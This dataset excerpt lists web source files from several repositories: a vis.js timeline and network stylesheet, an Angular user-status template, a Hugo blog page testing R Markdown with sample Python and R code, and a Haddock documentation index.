path
stringlengths
5
312
repo_name
stringlengths
5
116
content
stringlengths
2
1.04M
HTML/js/visjs/vis.min.css
kamac/PingMonitor
.vis .overlay { position: absolute; top: 0; left: 0; width: 100%; height: 100%; /* Must be displayed above for example selected Timeline items */ z-index: 10; } .vis-active { box-shadow: 0 0 10px #86d5f8; } /* override some bootstrap styles screwing up the timelines css */ .vis [class*="span"] { min-height: 0; width: auto; } .vis.timeline { } .vis.timeline.root { position: relative; border: 1px solid #0D0D0D; overflow: hidden; padding: 0; margin: 0; box-sizing: border-box; } .vis.timeline .vispanel { position: absolute; padding: 0; margin: 0; box-sizing: border-box; } .vis.timeline .vispanel.center, .vis.timeline .vispanel.left, .vis.timeline .vispanel.right, .vis.timeline .vispanel.top, .vis.timeline .vispanel.bottom { border: 1px #696969; } .vis.timeline .vispanel.center, .vis.timeline .vispanel.left, .vis.timeline .vispanel.right { border-top-style: solid; border-bottom-style: solid; overflow: hidden; } .vis.timeline .vispanel.center, .vis.timeline .vispanel.top, .vis.timeline .vispanel.bottom { border-left-style: solid; border-right-style: solid; } .vis.timeline .background { overflow: hidden; } .vis.timeline .vispanel > .content { position: relative; } .vis.timeline .vispanel .shadow { position: absolute; width: 100%; height: 1px; box-shadow: 0 0 10px rgba(0,0,0,0.8); /* TODO: find a nice way to ensure shadows are drawn on top of items z-index: 1; */ } .vis.timeline .vispanel .shadow.top { top: -1px; left: 0; } .vis.timeline .vispanel .shadow.bottom { bottom: -1px; left: 0; } .vis.timeline .labelset { position: relative; overflow: hidden; box-sizing: border-box; } .vis.timeline .labelset .vlabel { position: relative; left: 0; top: 0; width: 100%; color: #4d4d4d; box-sizing: border-box; } .vis.timeline .labelset .vlabel { border-bottom: 1px solid #bfbfbf; } .vis.timeline .labelset .vlabel:last-child { border-bottom: none; } .vis.timeline .labelset .vlabel .inner { display: inline-block; padding: 5px; } .vis.timeline .labelset .vlabel .inner.hidden { padding: 0; } .vis.timeline .itemset { position: relative; padding: 0; margin: 0; box-sizing: border-box; } .vis.timeline .itemset .background, .vis.timeline .itemset .foreground { position: absolute; width: 100%; height: 100%; overflow: visible; } .vis.timeline .axis { position: absolute; width: 100%; height: 0; left: 0; z-index: 1; } .vis.timeline .foreground .group { position: relative; box-sizing: border-box; border-bottom: 1px solid #bfbfbf; } .vis.timeline .foreground .group:last-child { border-bottom: none; } .vis.timeline .item { position: absolute; color: #1A1A1A; border-color: #97B0F8; border-width: 1px; background-color: #D5DDF6; display: inline-block; padding: 5px; } .vis.timeline .item.selected { border-color: #FFC200; background-color: #FFF785; /* z-index must be higher than the z-index of custom time bar and current time bar */ z-index: 2; } .vis.timeline .editable .item.selected { cursor: move; } .vis.timeline .item.point.selected { background-color: #FFF785; } .vis.timeline .item.box { text-align: center; border-style: solid; border-radius: 2px; } .vis.timeline .item.point { background: none; } .vis.timeline .item.dot { position: absolute; padding: 0; border-width: 4px; border-style: solid; border-radius: 4px; } .vis.timeline .item.range { border-style: solid; border-radius: 2px; box-sizing: border-box; } .vis.timeline .item.background { overflow: hidden; border: none; background-color: rgba(213, 221, 246, 0.4); box-sizing: border-box; padding: 0; margin: 0; } .vis.timeline .item.range .content { position: relative; display: inline-block; max-width: 100%; overflow: hidden; } .vis.timeline .item.background .content { position: absolute; display: inline-block; overflow: hidden; max-width: 100%; margin: 5px; } .vis.timeline .item.line { padding: 0; position: absolute; width: 0; border-left-width: 1px; border-left-style: solid; } .vis.timeline .item .content { white-space: nowrap; overflow: hidden; } .vis.timeline .item .delete { background: url('img/timeline/delete.png') no-repeat top center; position: absolute; width: 24px; height: 24px; top: 0; right: -24px; cursor: pointer; } .vis.timeline .item.range .drag-left { position: absolute; width: 24px; max-width: 20%; height: 100%; top: 0; left: -4px; cursor: w-resize; } .vis.timeline .item.range .drag-right { position: absolute; width: 24px; max-width: 20%; height: 100%; top: 0; right: -4px; cursor: e-resize; } .vis.timeline .timeaxis { position: relative; overflow: hidden; } .vis.timeline .timeaxis.foreground { top: 0; left: 0; width: 100%; } .vis.timeline .timeaxis.background { position: absolute; top: 0; left: 0; width: 100%; height: 100%; } .vis.timeline .timeaxis .text { position: absolute; color: #bebebe; padding: 3px; white-space: nowrap; } .vis.timeline .timeaxis .text.measure { position: absolute; padding-left: 0; padding-right: 0; margin-left: 0; margin-right: 0; visibility: hidden; } .vis.timeline .timeaxis .grid.vertical { position: absolute; border-left: 1px solid; } .vis.timeline .timeaxis .grid.minor { border-color: #333333; } .vis.timeline .timeaxis .grid.major { border-color: #333333; } .vis.timeline .currenttime { background-color: #FF7F6E; width: 2px; z-index: 1; } .vis.timeline .customtime { background-color: #6E94FF; width: 2px; cursor: move; z-index: 1; } .vis.timeline.root { /* -webkit-transition: height .4s ease-in-out; transition: height .4s ease-in-out; */ } .vis.timeline .vispanel { /* -webkit-transition: height .4s ease-in-out, top .4s ease-in-out; transition: height .4s ease-in-out, top .4s ease-in-out; */ } .vis.timeline .axis { /* -webkit-transition: top .4s ease-in-out; transition: top .4s ease-in-out; */ } /* TODO: get animation working nicely .vis.timeline .item { -webkit-transition: top .4s ease-in-out; transition: top .4s ease-in-out; } .vis.timeline .item.line { -webkit-transition: height .4s ease-in-out, top .4s ease-in-out; transition: height .4s ease-in-out, top .4s ease-in-out; } /**/ .vis.timeline .vispanel.background.horizontal .grid.horizontal { position: absolute; width: 100%; height: 0; border-bottom: 1px solid; } .vis.timeline .vispanel.background.horizontal .grid.minor { border-color: #333333; } .vis.timeline .vispanel.background.horizontal .grid.major { border-color: #333333; } .vis.timeline .dataaxis .yAxis.major { width: 100%; position: absolute; color: #bebebe; white-space: nowrap; } .vis.timeline .dataaxis .yAxis.major.measure{ padding: 0px 0px 0px 0px; margin: 0px 0px 0px 0px; border: 0px; visibility: hidden; width: auto; } .vis.timeline .dataaxis .yAxis.minor{ position: absolute; width: 100%; color: #bebebe; white-space: nowrap; } .vis.timeline .dataaxis .yAxis.minor.measure{ padding: 0px 0px 0px 0px; margin: 0px 0px 0px 0px; border: 0px; visibility: hidden; width: auto; } .vis.timeline .dataaxis .yAxis.title{ position: absolute; color: #4d4d4d; white-space: nowrap; bottom: 20px; text-align: center; } .vis.timeline .dataaxis .yAxis.title.measure{ padding: 0px 0px 0px 0px; margin: 0px 0px 0px 0px; visibility: hidden; width: auto; } .vis.timeline .dataaxis .yAxis.title.left { bottom: 0px; -webkit-transform-origin: left top; -moz-transform-origin: left top; -ms-transform-origin: left top; -o-transform-origin: left top; transform-origin: left bottom; -webkit-transform: rotate(-90deg); -moz-transform: rotate(-90deg); -ms-transform: rotate(-90deg); -o-transform: rotate(-90deg); transform: rotate(-90deg); } .vis.timeline .dataaxis .yAxis.title.right { bottom: 0px; -webkit-transform-origin: right bottom; -moz-transform-origin: right bottom; -ms-transform-origin: right bottom; -o-transform-origin: right bottom; transform-origin: right bottom; -webkit-transform: rotate(90deg); -moz-transform: rotate(90deg); -ms-transform: rotate(90deg); -o-transform: rotate(90deg); transform: rotate(90deg); } .vis.timeline .legend { background-color: rgba(247, 252, 255, 0.65); padding: 5px; border-color: #b3b3b3; border-style:solid; border-width: 1px; box-shadow: 2px 2px 10px rgba(154, 154, 154, 0.55); } .vis.timeline .legendText { /*font-size: 10px;*/ white-space: nowrap; display: inline-block } .vis.timeline .graphGroup0 { fill:#4f81bd; fill-opacity:0; stroke-width:2px; stroke: #4f81bd; } .vis.timeline .graphGroup1 { fill:#f79646; fill-opacity:0; stroke-width:2px; stroke: #f79646; } .vis.timeline .graphGroup2 { fill: #8c51cf; fill-opacity:0; stroke-width:2px; stroke: #8c51cf; } .vis.timeline .graphGroup3 { fill: #75c841; fill-opacity:0; stroke-width:2px; stroke: #75c841; } .vis.timeline .graphGroup4 { fill: #ff0100; fill-opacity:0; stroke-width:2px; stroke: #ff0100; } .vis.timeline .graphGroup5 { fill: #37d8e6; fill-opacity:0; stroke-width:2px; stroke: #37d8e6; } .vis.timeline .graphGroup6 { fill: #042662; fill-opacity:0; stroke-width:2px; stroke: #042662; } .vis.timeline .graphGroup7 { fill:#00ff26; fill-opacity:0; stroke-width:2px; stroke: #00ff26; } .vis.timeline .graphGroup8 { fill:#ff00ff; fill-opacity:0; stroke-width:2px; stroke: #ff00ff; } .vis.timeline .graphGroup9 { fill: #FF0000; fill-opacity:0; stroke-width:2px; stroke: #FF0000; } .vis.timeline .fill { fill-opacity:0.1; stroke: none; } .vis.timeline .bar { fill-opacity:0.5; stroke-width:1px; } .vis.timeline .point { stroke-width:2px; fill-opacity:1.0; } .vis.timeline .legendBackground { stroke-width:1px; fill-opacity:0.9; fill: #ffffff; stroke: #c2c2c2; } .vis.timeline .outline { stroke-width:1px; fill-opacity:1; fill: #ffffff; stroke: #e5e5e5; } .vis.timeline .iconFill { fill-opacity:0.3; stroke: none; } div.network-manipulationDiv { border-width: 0; border-bottom: 1px; border-style:solid; border-color: #d6d9d8; background: #ffffff; /* Old browsers */ background: -moz-linear-gradient(top, #ffffff 0%, #fcfcfc 48%, #fafafa 50%, #fcfcfc 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ffffff), color-stop(48%,#fcfcfc), color-stop(50%,#fafafa), color-stop(100%,#fcfcfc)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #ffffff 0%,#fcfcfc 48%,#fafafa 50%,#fcfcfc 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #ffffff 0%,#fcfcfc 48%,#fafafa 50%,#fcfcfc 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #ffffff 0%,#fcfcfc 48%,#fafafa 50%,#fcfcfc 100%); /* IE10+ */ background: linear-gradient(to bottom, #ffffff 0%,#fcfcfc 48%,#fafafa 50%,#fcfcfc 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ffffff', endColorstr='#fcfcfc',GradientType=0 ); /* IE6-9 */ position: absolute; left: 0; top: 0; width: 100%; height: 30px; } div.network-manipulation-editMode { position:absolute; left: 0; top: 15px; height: 30px; } div.network-manipulation-closeDiv { position:absolute; right: 0; top: 0; width: 30px; height: 30px; background-position: 20px 3px; background-repeat: no-repeat; background-image: url("img/network/cross.png"); cursor: pointer; -webkit-touch-callout: none; -webkit-user-select: none; -khtml-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } div.network-manipulation-closeDiv:hover { opacity: 0.6; } div.network-manipulationUI { position:relative; top:-7px; font-family: verdana; font-size: 12px; -moz-border-radius: 15px; border-radius: 15px; display:inline-block; background-position: 0px 0px; background-repeat:no-repeat; height:24px; margin: 0px 0px 0px 10px; vertical-align:middle; cursor: pointer; padding: 0px 8px 0px 8px; -webkit-touch-callout: none; -webkit-user-select: none; -khtml-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } div.network-manipulationUI:hover { box-shadow: 1px 1px 8px rgba(0, 0, 0, 0.20); } div.network-manipulationUI:active { box-shadow: 1px 1px 8px rgba(0, 0, 0, 0.50); } div.network-manipulationUI.back { background-image: url("img/network/backIcon.png"); } div.network-manipulationUI.none:hover { box-shadow: 1px 1px 8px rgba(0, 0, 0, 0.0); cursor: default; } div.network-manipulationUI.none:active { box-shadow: 1px 1px 8px rgba(0, 0, 0, 0.0); } div.network-manipulationUI.none { padding: 0; } div.network-manipulationUI.notification{ margin: 2px; font-weight: bold; } div.network-manipulationUI.add { background-image: url("img/network/addNodeIcon.png"); } div.network-manipulationUI.edit { background-image: url("img/network/editIcon.png"); } div.network-manipulationUI.edit.editmode { background-color: #fcfcfc; border-style:solid; border-width:1px; border-color: #cccccc; } div.network-manipulationUI.connect { background-image: url("img/network/connectIcon.png"); } div.network-manipulationUI.delete { background-image: url("img/network/deleteIcon.png"); } /* top right bottom left */ div.network-manipulationLabel { margin: 0px 0px 0px 23px; line-height: 25px; } div.network-seperatorLine { display:inline-block; width:1px; height:20px; background-color: #bdbdbd; margin: 5px 7px 0px 15px; } div.network-navigation_wrapper { position: absolute; left: 0; top: 0; width: 100%; height: 100%; } div.network-navigation { width:34px; height:34px; -moz-border-radius: 17px; border-radius: 17px; position:absolute; display:inline-block; background-position: 2px 2px; background-repeat:no-repeat; cursor: pointer; -webkit-touch-callout: none; -webkit-user-select: none; -khtml-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } div.network-navigation:hover { box-shadow: 0px 0px 3px 3px rgba(56, 207, 21, 0.30); } div.network-navigation:active { box-shadow: 0px 0px 1px 3px rgba(56, 207, 21, 0.95); } div.network-navigation.up { background-image: url("img/network/upArrow.png"); bottom:50px; left:55px; } div.network-navigation.down { background-image: url("img/network/downArrow.png"); bottom:10px; left:55px; } div.network-navigation.left { background-image: url("img/network/leftArrow.png"); bottom:10px; left:15px; } div.network-navigation.right { background-image: url("img/network/rightArrow.png"); bottom:10px; left:95px; } div.network-navigation.zoomIn { background-image: url("img/network/plus.png"); bottom:10px; right:15px; } div.network-navigation.zoomOut { background-image: url("img/network/minus.png"); bottom:10px; right:55px; } div.network-navigation.zoomExtends { background-image: url("img/network/zoomExtends.png"); bottom:50px; right:15px; } div.network-tooltip { position: absolute; visibility: hidden; padding: 5px; white-space: nowrap; -moz-border-radius: 3px; -webkit-border-radius: 3px; border-radius: 3px; border: 1px solid; box-shadow: 3px 3px 10px rgba(128, 128, 128, 0.5); }
self-registration/src/portal/widgets/sspr-status/sspr-status-view.component.html
MicroFocus/CX
<div class="user-card" ng-class="$ctrl.userCardClass"> <div class="personal-info"> <img src="/assets/images/user-photo.png" /> <div class="user-id field-value">{{$ctrl.userConfig.userID}}</div> <div class="user-email field-value">{{$ctrl.userConfig.userEmailAddress}}</div> </div> <div> <span class="field-name">User DN</span><span class="field-value">{{$ctrl.userConfig.userDN}}</span> </div> <div> <span class="field-name">LDAP Profile</span><span class="field-value">{{$ctrl.userConfig.ldapProfile}}</span> </div> <div> <span class="field-name">User ID</span><span class="field-value">{{$ctrl.userConfig.userID}}</span> </div> <div> <span class="field-name">Password last modified</span><span class="field-value">{{$ctrl.userConfig.passwordLastModifiedTime}}</span> </div> </div> <ias-button ng-click="$ctrl.refreshData()">Refresh</ias-button>
post/2017-11-27-r-rmarkdown/index.html
phgrosjean/phgrosjean.github.io
<!DOCTYPE html> <html lang="en-us"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="theme" content="hugo-academic"> <meta name="generator" content="Hugo 0.31.1" /> <meta name="author" content="Philippe Grosjean"> <meta name="description" content="Professor of Marine Ecology and Data Sciences"> <link rel="alternate" hreflang="en-us" href="/post/2017-11-27-r-rmarkdown/"> <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/github.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha512-6MXa8B6uaO18Hid6blRMetEIoPqHf7Ux1tnyIQdpt9qI5OACx7C+O3IVTr98vwGnlcg0LOLa02i9Y1HpVhlfiw==" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/academicons/1.8.1/css/academicons.min.css" integrity="sha512-NThgw3XKQ1absAahW6to7Ey42uycrVvfNfyjqcFNgCmOCQ5AR4AO0SiXrN+8ZtYeappp56lk1WtvjVmEa+VR6A==" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha512-SfTiTlX6kk+qitfevl/7LibUOeJWlt9rbyDn92a1DqWOw9vWG2MFoays0sgObmWazO5BQPiFucnnEAjpAB+/Sw==" crossorigin="anonymous"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Montserrat:400,700%7cRoboto:400,400italic,700%7cRoboto&#43;Mono"> <link rel="stylesheet" href="/styles.css"> <link rel="alternate" href="/index.xml" type="application/rss+xml" title="Philippe Grosjean"> <link rel="feed" href="/index.xml" type="application/rss+xml" title="Philippe Grosjean"> <link rel="manifest" href="/site.webmanifest"> <link rel="icon" type="image/png" href="/img/icon.png"> <link rel="apple-touch-icon" type="image/png" href="/img/icon-192.png"> <link rel="canonical" href="/post/2017-11-27-r-rmarkdown/"> <meta property="twitter:card" content="summary_large_image"> <meta property="twitter:site" content="@PhilGrosjean"> <meta property="twitter:creator" content="@PhilGrosjean"> <meta property="og:site_name" content="Philippe Grosjean"> <meta property="og:url" content="/post/2017-11-27-r-rmarkdown/"> <meta property="og:title" content="R Markdown test | Philippe Grosjean"> <meta property="og:description" content=""> <meta property="og:locale" content="en-us"> <meta property="article:published_time" content="2017-11-27T18:36:00-01:00"> <meta property="article:modified_time" content="2017-11-27T18:36:00-01:00"> <title>R Markdown test | Philippe Grosjean</title> </head> <body id="top" data-spy="scroll" data-target="#toc" data-offset="71" > <nav class="navbar navbar-default navbar-fixed-top" id="navbar-main"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target=".navbar-collapse" aria-expanded="false"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="/"><img src="/img/logo.png" alt="Philippe Grosjean"></a> </div> <div class="collapse navbar-collapse"> <ul class="nav navbar-nav navbar-right"> <li class="nav-item"> <a href="/#about"> <span>Home</span> </a> </li> <li class="nav-item"> <a href="/#publications_selected"> <span>Publications</span> </a> </li> <li class="nav-item"> <a href="/#posts"> <span>Posts</span> </a> </li> <li class="nav-item"> <a href="/#projects"> <span>Projects</span> </a> </li> <li class="nav-item"> <a href="/#teaching"> <span>Teaching</span> </a> </li> <li class="nav-item"> <a href="/#tags"> <span>Tags</span> </a> </li> <li class="nav-item"> <a href="/#contact"> <span>Contact</span> </a> </li> </ul> </div> </div> </nav> <article class="article" itemscope itemtype="http://schema.org/Article"> <div class="article-container"> <div class="article-inner"> <h1 itemprop="name">R Markdown test</h1> <div class="article-metadata"> <span class="article-date"> <time datetime="2017-11-27 18:36:00 -0100 -0100" itemprop="datePublished"> 2017-11-27 </time> </span> <span class="middot-divider"></span> <span class="article-reading-time"> 2 min read </span> <span class="middot-divider"></span> <a href="/post/2017-11-27-r-rmarkdown/#disqus_thread"></a> <span class="middot-divider"></span> <span class="article-categories"> <i class="fa fa-folder"></i> <a href="/categories/r">R</a > </span> <div class="share-box" aria-hidden="true"> <ul class="share"> <li> <a class="twitter" href="https://twitter.com/intent/tweet?text=R%20Markdown%20test&amp;url=%2fpost%2f2017-11-27-r-rmarkdown%2f" target="_blank" rel="noopener"> <i class="fa fa-twitter"></i> </a> </li> <li> <a class="facebook" href="https://www.facebook.com/sharer.php?u=%2fpost%2f2017-11-27-r-rmarkdown%2f" target="_blank" rel="noopener"> <i class="fa fa-facebook"></i> </a> </li> <li> <a class="linkedin" href="https://www.linkedin.com/shareArticle?mini=true&amp;url=%2fpost%2f2017-11-27-r-rmarkdown%2f&amp;title=R%20Markdown%20test" target="_blank" rel="noopener"> <i class="fa fa-linkedin"></i> </a> </li> <li> <a class="weibo" href="http://service.weibo.com/share/share.php?url=%2fpost%2f2017-11-27-r-rmarkdown%2f&amp;title=R%20Markdown%20test" target="_blank" rel="noopener"> <i class="fa fa-weibo"></i> </a> </li> <li> <a class="email" href="mailto:?subject=R%20Markdown%20test&amp;body=%2fpost%2f2017-11-27-r-rmarkdown%2f"> <i class="fa fa-envelope"></i> </a> </li> </ul> </div> </div> <div class="article-style" itemprop="articleBody"> <p>Some example Python code:</p> <pre class="python"><code>import re for test_string in [&#39;555-1212&#39;, &#39;ILL-EGAL&#39;]: if re.match(r&#39;^\d{3}-\d{4}$&#39;, test_string): print test_string, &#39;is a valid US local phone number&#39; else: print test_string, &#39;rejected&#39;</code></pre> <p>… and R code:</p> <pre class="r"><code>cube &lt;- function(x) { if (!is.numeric(x)) stop(&quot;&#39;x&#39; must be numeric&quot;) return(x^3) } # Use this function cube(1:10)</code></pre> <p>R Chunks:</p> <div id="r-markdown" class="section level2"> <h2>R Markdown</h2> <p>Test of an R Markdown post, see <a href="http://rmarkdown.rstudio.com" class="uri">http://rmarkdown.rstudio.com</a>. You can embed an R code chunk like this:</p> <pre class="r"><code>cars_lm &lt;- lm(dist ~ speed, data = cars) cars_lm ## ## Call: ## lm(formula = dist ~ speed, data = cars) ## ## Coefficients: ## (Intercept) speed ## -17.579 3.932</code></pre> </div> <div id="including-plots" class="section level2"> <h2>Including Plots</h2> <p>You can also embed plots. See Figure <a href="#fig:pie">1</a> for example:</p> <pre class="r"><code>par(mar = c(0, 1, 0, 1)) pie( c(280, 60, 20), c(&#39;Sky&#39;, &#39;Sunny side of pyramid&#39;, &#39;Shady side of pyramid&#39;), col = c(&#39;#0292D8&#39;, &#39;#F7EA39&#39;, &#39;#C4B632&#39;), init.angle = -50, border = NA )</code></pre> <div class="figure"><span id="fig:pie"></span> <img src="/post/2017-11-27-r-rmarkdown_files/figure-html/pie-1.png" alt="A fancy pie chart." width="672" /> <p class="caption"> Figure 1: A fancy pie chart. </p> </div> <div class="alert alert-note"> <p>You can use an <code>alert note</code> to stand out a section.</p> </div> </div> <div id="hugo-shortcodes" class="section level2"> <h2>Hugo shortcodes</h2> <p>In R Markdown, you should not use the <code>{{&lt; tweet 936232450006704128 &gt;}}</code> syntax. Instead, you should use:</p> <blockquote class="twitter-tweet"><p lang="en" dir="ltr">Excited about the new R Release? <a href="https://twitter.com/hashtag/rstats?src=hash&amp;ref_src=twsrc%5Etfw">#rstats</a><br>😋🎋 Welcome &quot;Kite-Eating Tree&quot;!<br>🙌🎥 gif courtesy of <a href="https://twitter.com/pdalgd?ref_src=twsrc%5Etfw">@pdalgd</a>!<br>🤔👇 Curious about the other R release name origins? Check out our post!<br>🔗 <a href="https://t.co/b7XkQKwHpM">https://t.co/b7XkQKwHpM</a> <a href="https://t.co/J1UNks276A">pic.twitter.com/J1UNks276A</a></p>&mdash; 𝓛𝓾𝓬𝔂::maternity_leave🤱 (@LucyStats) <a href="https://twitter.com/LucyStats/status/936232450006704128?ref_src=twsrc%5Etfw">November 30, 2017</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> <div id="other-examples" class="section level3"> <h3>Other examples</h3> <p>Youtube</p> <div style="position: relative; padding-bottom: 56.25%; padding-top: 30px; height: 0; overflow: hidden;"> <iframe src="//www.youtube.com/embed/ZwYQPtU2Pa0" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%;" allowfullscreen frameborder="0" title="YouTube Video"></iframe> </div> <p>Vimeo</p> <div style="position: relative; padding-bottom: 56.25%; padding-top: 30px; height: 0; overflow: hidden;"> <iframe src="//player.vimeo.com/video/146022717" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%;" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe> </div> <p>Github Gist</p> <script src="//gist.github.com/phgrosjean/f1d53c0dc1124522b2138033188497d0.js"></script> <p>Speakerdeck</p> <script async class='speakerdeck-embed' data-id='4e8126e72d853c0060001f97' data-ratio='1.33333333333333' src='//speakerdeck.com/assets/embed.js'></script> <p>Figure</p> <figure > <img src="/img/coral.jpg" alt="A nice fluorescent coral" /> </figure> </div> </div> </div> <div class="article-tags"> <a class="btn btn-primary btn-outline" href="/tags/r-markdown">R Markdown</a> <a class="btn btn-primary btn-outline" href="/tags/plot">plot</a> <a class="btn btn-primary btn-outline" href="/tags/regression">regression</a> </div> </div> </div> </article> <div class="article-container article-widget"> <div class="hr-light"></div> <h3>Related</h3> <ul> <li><a href="/post/writing-markdown-latex/">Writing content with Markdown, LaTeX, and Shortcodes</a></li> </ul> </div> <div class="container article-widget"> <nav> <ul class="pager"> <li class="previous"><a href="/post/getting-started/"><span aria-hidden="true">&larr;</span> Getting started with the Academic framework for Hugo</a></li> <li class="next"><a href="/post/sciviews-box/">SciViews Box <span aria-hidden="true">&rarr;</span></a></li> </ul> </nav> </div> <div class="article-container"> <section id="comments"> <div id="disqus_thread"></div> <script> var disqus_config = function () { }; (function() { if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) { document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.'; return; } var d = document, s = d.createElement('script'); s.async = true; s.src = '//' + "phgrosjean" + '.disqus.com/embed.js'; s.setAttribute('data-timestamp', +new Date()); (d.head || d.body).appendChild(s); })(); </script> <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript> <a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a> </section> </div> <footer class="site-footer"> <div class="container"> <p class="powered-by"> &copy; 2017-2018 Philippe Grosjean (license <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a>) &middot; Powered by the <a href="https://sourcethemes.com/academic/" target="_blank" rel="noopener">Academic theme</a> for <a href="https://gohugo.io" target="_blank" rel="noopener">Hugo</a>. <span class="pull-right" aria-hidden="true"> <a href="#" id="back_to_top"> <span class="button_icon"> <i class="fa fa-chevron-up fa-2x"></i> </span> </a> </span> </p> </div> </footer> <div id="modal" class="modal fade" role="dialog"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close btn-large" data-dismiss="modal">&times;</button> <h4 class="modal-title">Cite</h4> </div> <div> <pre><code class="modal-body tex"></code></pre> </div> <div class="modal-footer"> <a class="btn btn-primary btn-outline js-copy-cite" href="#" target="_blank"> <i class="fa fa-copy"></i> Copy </a> <a class="btn btn-primary btn-outline js-download-cite" href="#" target="_blank"> <i class="fa fa-download"></i> Download </a> <div id="modal-error"></div> </div> </div> </div> </div> <script id="dsq-count-scr" src="//phgrosjean.disqus.com/count.js" async></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js" integrity="sha512-3P8rXCuGJdNZOnUx/03c1jOTnMn3rP63nBip5gOP2qmUh5YAdVAvFZ1E+QLZZbC1rtMrQb+mah3AfYW11RUrWA==" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.imagesloaded/4.1.3/imagesloaded.pkgd.min.js" integrity="sha512-umsR78NN0D23AzgoZ11K7raBD+R6hqKojyBZs1w8WvYlsI+QuKRGBx3LFCwhatzBunCjDuJpDHwxD13sLMbpRA==" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha512-iztkobsvnjKfAtTNdHkGVjAYTrrtlC7mGp/54c40wowO7LhURYl3gVzzcEqGl/qKXQltJ2HwMrdLcNUdo+N/RQ==" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.isotope/3.0.4/isotope.pkgd.min.js" integrity="sha512-VDBOIlDbuC4VWxGJNmuFRQ0Li0SKkDpmGyuhAG5LTDLd/dJ/S0WMVxriR2Y+CyPL5gzjpN4f/6iqWVBJlht0tQ==" crossorigin="anonymous"></script> <script src="/js/hugo-academic.js"></script> <script src="/js/highlight.min.js"></script> <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/languages/python.min.js"></script> <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/languages/r.min.js"></script> <script>hljs.initHighlightingOnLoad();</script> <script type="text/x-mathjax-config"> MathJax.Hub.Config({ tex2jax: { inlineMath: [['$','$'], ['\\(','\\)']] } }); </script> <script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS_CHTML" integrity="sha512-tOav5w1OjvsSJzePRtt2uQPFwBoHt1VZcUq8l8nm5284LEKE9FSJBQryzMBzHxY5P0zRdNqEcpLIRVYFNgu1jw==" crossorigin="anonymous"></script> </body> </html>
doc/index.html
wyager/Dist
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title></title><link href="ocean.css" rel="stylesheet" type="text/css" title="Ocean" /><script src="haddock-util.js" type="text/javascript"></script><script type="text/javascript">//<![CDATA[ window.onload = function () {pageLoad();}; //]]> </script></head><body><div id="package-header"><ul class="links" id="page-menu"><li><a href="index.html">Contents</a></li><li><a href="doc-index.html">Index</a></li></ul><p class="caption empty">&nbsp;</p></div><div id="content"><div id="module-list"><p class="caption">Modules</p><ul><li><span id="control.n.1" class="module collapser" onclick="toggleSection('n.1')">Numeric</span><ul id="section.n.1" class="show"><li><span id="control.n.1.1" class="module collapser" onclick="toggleSection('n.1.1')">Probability</span><ul id="section.n.1.1" class="show"><li><span class="module"><a href="Numeric-Probability-Distribution.html">Numeric.Probability.Distribution</a></span></li></ul></li></ul></li></ul></div></div><div id="footer"><p>Produced by <a href="http://www.haskell.org/haddock/">Haddock</a> version 2.14.3</p></div></body></html>
docs/_build/html/genindex.html
harisubramaniam/taskbuster-boilerplate
